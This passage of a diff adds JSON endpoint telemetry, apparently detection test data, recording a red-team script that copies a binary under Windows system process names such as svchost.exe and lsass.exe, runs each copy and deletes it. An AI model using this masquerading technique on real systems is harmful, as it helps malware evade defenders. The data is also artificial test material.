131485996810000000, + "unique_pid": 31, + "unique_ppid": 8, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\sppsvc.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "e17e0188bb90fae42d83e98707efa59c", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 2804, + "ppid": 524, + "process_name": "sppsvc.exe", + "process_path": "C:\\Windows\\System32\\sppsvc.exe", + "serial_event_id": 32, + "subtype": "create", + "timestamp": 131485996810000000, + "unique_pid": 32, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "\"C:\\Windows\\system32\\Dwm.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f162d5f5e845b9dc352dd1bad8cef1bc", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2464, + "ppid": 896, + "process_name": "dwm.exe", + "process_path": "C:\\Windows\\System32\\dwm.exe", + "serial_event_id": 33, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 33, + "unique_ppid": 16, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\Explorer.EXE", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ac4c51eb24aa95b77f705ab159189e24", + "opcode": 3, + "pid": 2460, + "ppid": 3052, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "serial_event_id": 34, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 34, + "unique_ppid": 0, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "404202d6f0628331aaade8c8f9ef6feb", + "opcode": 3, + "parent_process_name": "explorer.exe", + "parent_process_path": "C:\\Windows\\explorer.exe", + "pid": 2604, + "ppid": 2460, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "serial_event_id": 35, + "subtype": "create", + "timestamp": 131485997150000000, + "unique_pid": 35, + "unique_ppid": 34, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\SearchIndexer.exe /Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ad31942bdf3d594c404874613bc2fe4d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1620, + "ppid": 524, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "serial_event_id": 36, + "subtype": "create", + "timestamp": 131485997210000000, + "unique_pid": 36, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3684, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 37, + "subtype": "create", + "timestamp": 131485997750000000, + "unique_pid": 37, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k secsvcs", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3712, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 38, + "subtype": "create", + "timestamp": 131485997750000000, + "unique_pid": 38, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Windows\\system32\\cmd.exe\" ", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 3, + "parent_process_name": "explorer.exe", + "parent_process_path": "C:\\Windows\\explorer.exe", + "pid": 2864, + "ppid": 2460, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 39, + "subtype": "create", + "timestamp": 131491838190000000, + "unique_pid": 39, + "unique_ppid": 34, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "bd51024fb014064bc9fe8c715c18392f", + "opcode": 3, + "parent_process_name": "csrss.exe", + "parent_process_path": "C:\\Windows\\System32\\csrss.exe", + "pid": 2228, + "ppid": 3048, + "process_name": "conhost.exe", + "process_path": "C:\\Windows\\System32\\conhost.exe", + "serial_event_id": 40, + "subtype": "create", + "timestamp": 131491838190000000, + "unique_pid": 40, + "unique_ppid": 28, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k SDRSVC", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3820, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 41, + "subtype": "create", + "timestamp": 131491940310000000, + "unique_pid": 41, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\servicing\\TrustedInstaller.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "773212b2aaa24c1e31f10246b15b276c", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3384, + "ppid": 524, + "process_name": "TrustedInstaller.exe", + "process_path": "C:\\Windows\\servicing\\TrustedInstaller.exe", + "serial_event_id": 42, + "subtype": "create", + "timestamp": 131509366130000000, + "unique_pid": 42, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "8f4ecbbfe943030acfd9e892b2513ec1", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1860, + "ppid": 648, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "serial_event_id": 43, + "subtype": "create", + "timestamp": 131509366230000000, + "unique_pid": 43, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "taskeng.exe {6108575A-1CC2-4917-BB5D-5929CDC39B9C}", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "65ea57712340c09b1b0c427b4848ae05", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 660, + "ppid": 924, + "process_name": "taskeng.exe", + "process_path": "C:\\Windows\\System32\\taskeng.exe", + "serial_event_id": 44, + "subtype": "create", + "timestamp": 131509371900000000, + "unique_pid": 44, + "unique_ppid": 17, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\msiexec.exe /V", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "a190da6546501cb4146bbcc0b6a3f48b", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 760, + "ppid": 524, + "process_name": "msiexec.exe", + "process_path": "C:\\Windows\\System32\\msiexec.exe", + "serial_event_id": 45, + "subtype": "create", + "timestamp": 131509372370000000, + "unique_pid": 45, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3e5cfefdda537ddbed9f5c6c7e926cdd", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2824, + "ppid": 648, + "process_name": "wsmprovhost.exe", + "process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "serial_event_id": 46, + "subtype": "create", + "timestamp": 131509373980000000, + "unique_pid": 46, + "unique_ppid": 11, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3e5cfefdda537ddbed9f5c6c7e926cdd", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 3408, + "ppid": 648, + "process_name": "wsmprovhost.exe", + "process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "serial_event_id": 47, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 47, + "unique_ppid": 11, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"C:\\Python27\\python.exe\" worker.py --target c:\\workspace\\red_ttp\\process_name_masquerade.py", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "wsmprovhost.exe", + "parent_process_path": "C:\\Windows\\System32\\wsmprovhost.exe", + "pid": 420, + "ppid": 3408, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 48, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 48, + "unique_ppid": 47, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "bd51024fb014064bc9fe8c715c18392f", + "opcode": 3, + "parent_process_name": "csrss.exe", + "parent_process_path": "C:\\Windows\\System32\\csrss.exe", + "pid": 3080, + "ppid": 372, + "process_name": "conhost.exe", + "process_path": "C:\\Windows\\System32\\conhost.exe", + "serial_event_id": 49, + "subtype": "create", + "timestamp": 131509374020000000, + "unique_pid": 49, + "unique_ppid": 4, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Python27\\python.exe myappserver.py --log-file C:\\workspace\\dev\\myapp.out --update-server-port 8446 --sout C:\\workspace\\Libraries\\myapp\\myapp\\python\\myapp\\hunt_out.json", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1688, + "ppid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 50, + "subtype": "create", + "timestamp": 131509374100000000, + "unique_pid": 50, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Python27\\python.exe C:\\workspace\\dev\\Simple_Https_Server\\simple_https_server.py", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 3, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1720, + "ppid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 51, + "subtype": "create", + "timestamp": 131509374100000000, + "unique_pid": 51, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "C:\\Windows\\System32\\LauncherProcess.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "6a8649f3205b311e208ac35a04e99700", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2164, + "ppid": 648, + "process_name": "LauncherProcess.exe", + "process_path": "C:\\Windows\\System32\\LauncherProcess.exe", + "serial_event_id": 52, + "subtype": "create", + "timestamp": 131509374150000000, + "unique_pid": 52, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\cmd.exe /c \"c:\\workspace\\red_ttp\\process_name_masquerade.py\"", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1788, + "ppid": 420, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 53, + "subtype": "create", + "timestamp": 131509374294209140, + "unique_pid": 53, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"C:\\Python27\\python.exe\" \"C:\\workspace\\red_ttp\\process_name_masquerade.py\" ", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 1, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2256, + "ppid": 1788, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 54, + "subtype": "create", + "timestamp": 131509374294365140, + "unique_pid": 54, + "unique_ppid": 53, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "svchost.exe", + "file_path": "C:\\workspace\\red_ttp\\svchost.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 55, + "subtype": "create", + "timestamp": 131509374295457140, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "svchost.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 2760, + "ppid": 2256, + "process_name": "svchost.exe", + "process_path": "C:\\workspace\\red_ttp\\svchost.exe", + "serial_event_id": 56, + "subtype": "create", + "timestamp": 131509374295613140, + "unique_pid": 56, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "bytes_written_count": 20, + "bytes_written_string_list": [ + "en-US", + "en" + ], + "event_subtype_full": "registry_modify_event", + "event_type": "registry", + "event_type_full": "registry_event", + "key_path": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E\\LanguageList", + "key_type": "multiSz", + "opcode": 1, + "pid": 2460, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "registry_key": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E", + "registry_path": "\\REGISTRY\\USER\\S-1-5-21-3942132181-2402070379-3970972291-1001_CLASSES\\Local Settings\\MuiCache\\1B\\52C64B7E\\LanguageList", + "registry_type": "multi_string", + "registry_value": "LanguageList", + "serial_event_id": 57, + "timestamp": 131509374306065200, + "unique_pid": 34, + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 2760, + "ppid": 2256, + "process_name": "svchost.exe", + "process_path": "C:\\workspace\\red_ttp\\svchost.exe", + "serial_event_id": 58, + "subtype": "terminate", + "timestamp": 131509374345689460, + "unique_pid": 56, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "svchost.exe", + "file_path": "C:\\workspace\\red_ttp\\svchost.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 59, + "subtype": "modify", + "timestamp": 131509374345689460, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SVCHOST.EXE-CB1B3AA2.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-CB1B3AA2.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 60, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "lsass.exe", + "file_path": "C:\\workspace\\red_ttp\\lsass.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 61, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "lsass.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3696, + "ppid": 2256, + "process_name": "lsass.exe", + "process_path": "C:\\workspace\\red_ttp\\lsass.exe", + "serial_event_id": 62, + "subtype": "create", + "timestamp": 131509374345689460, + "unique_pid": 62, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "request_event", + "event_type": "generic", + "event_type_full": "dns_event", + "opcode": 3008, + "pid": 924, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "query_name": "teredo.ipv6.microsoft.com.", + "serial_event_id": 63, + "timestamp": 131509374350369490, + "unique_pid": 17, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3696, + "ppid": 2256, + "process_name": "lsass.exe", + "process_path": "C:\\workspace\\red_ttp\\lsass.exe", + "serial_event_id": 64, + "subtype": "terminate", + "timestamp": 131509374395921780, + "unique_pid": 62, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "lsass.exe", + "file_path": "C:\\workspace\\red_ttp\\lsass.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 65, + "subtype": "modify", + "timestamp": 131509374395921780, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "LSASS.EXE-02265BD5.pf", + "file_path": "C:\\Windows\\Prefetch\\LSASS.EXE-02265BD5.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 66, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "services.exe", + "file_path": "C:\\workspace\\red_ttp\\services.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 67, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "services.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1832, + "ppid": 2256, + "process_name": "services.exe", + "process_path": "C:\\workspace\\red_ttp\\services.exe", + "serial_event_id": 68, + "subtype": "create", + "timestamp": 131509374395921780, + "unique_pid": 68, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1832, + "ppid": 2256, + "process_name": "services.exe", + "process_path": "C:\\workspace\\red_ttp\\services.exe", + "serial_event_id": 69, + "subtype": "terminate", + "timestamp": 131509374446778110, + "unique_pid": 68, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "services.exe", + "file_path": "C:\\workspace\\red_ttp\\services.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 70, + "subtype": "modify", + "timestamp": 131509374446778110, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SERVICES.EXE-01D9177B.pf", + "file_path": "C:\\Windows\\Prefetch\\SERVICES.EXE-01D9177B.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 71, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "csrss.exe", + "file_path": "C:\\workspace\\red_ttp\\csrss.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 72, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "csrss.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3948, + "ppid": 2256, + "process_name": "csrss.exe", + "process_path": "C:\\workspace\\red_ttp\\csrss.exe", + "serial_event_id": 73, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 73, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3948, + "ppid": 2256, + "process_name": "csrss.exe", + "process_path": "C:\\workspace\\red_ttp\\csrss.exe", + "serial_event_id": 74, + "subtype": "terminate", + "timestamp": 131509374497010430, + "unique_pid": 73, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "csrss.exe", + "file_path": "C:\\workspace\\red_ttp\\csrss.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 75, + "subtype": "modify", + "timestamp": 131509374497010430, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "smss.exe", + "file_path": "C:\\workspace\\red_ttp\\smss.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 76, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "CSRSS.EXE-006B4E4D.pf", + "file_path": "C:\\Windows\\Prefetch\\CSRSS.EXE-006B4E4D.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 77, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "smss.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3720, + "ppid": 2256, + "process_name": "smss.exe", + "process_path": "C:\\workspace\\red_ttp\\smss.exe", + "serial_event_id": 78, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 78, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "bytes_written_count": 80, + "event_subtype_full": "registry_modify_event", + "event_type": "registry", + "event_type_full": "registry_event", + "key_path": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9\\F", + "key_type": "binary", + "opcode": 1, + "pid": 536, + "process_name": "lsass.exe", + "process_path": "C:\\Windows\\System32\\lsass.exe", + "registry_key": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9", + "registry_path": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9\\F", + "registry_type": "binary", + "registry_value": "F", + "serial_event_id": 79, + "timestamp": 131509374520566580, + "unique_pid": 9, + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3720, + "ppid": 2256, + "process_name": "smss.exe", + "process_path": "C:\\workspace\\red_ttp\\smss.exe", + "serial_event_id": 80, + "subtype": "terminate", + "timestamp": 131509374547086750, + "unique_pid": 78, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "smss.exe", + "file_path": "C:\\workspace\\red_ttp\\smss.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 81, + "subtype": "modify", + "timestamp": 131509374547086750, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SMSS.EXE-8C66D82D.pf", + "file_path": "C:\\Windows\\Prefetch\\SMSS.EXE-8C66D82D.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 82, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "wininit.exe", + "file_path": "C:\\workspace\\red_ttp\\wininit.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 83, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "wininit.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1680, + "ppid": 2256, + "process_name": "wininit.exe", + "process_path": "C:\\workspace\\red_ttp\\wininit.exe", + "serial_event_id": 84, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 84, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 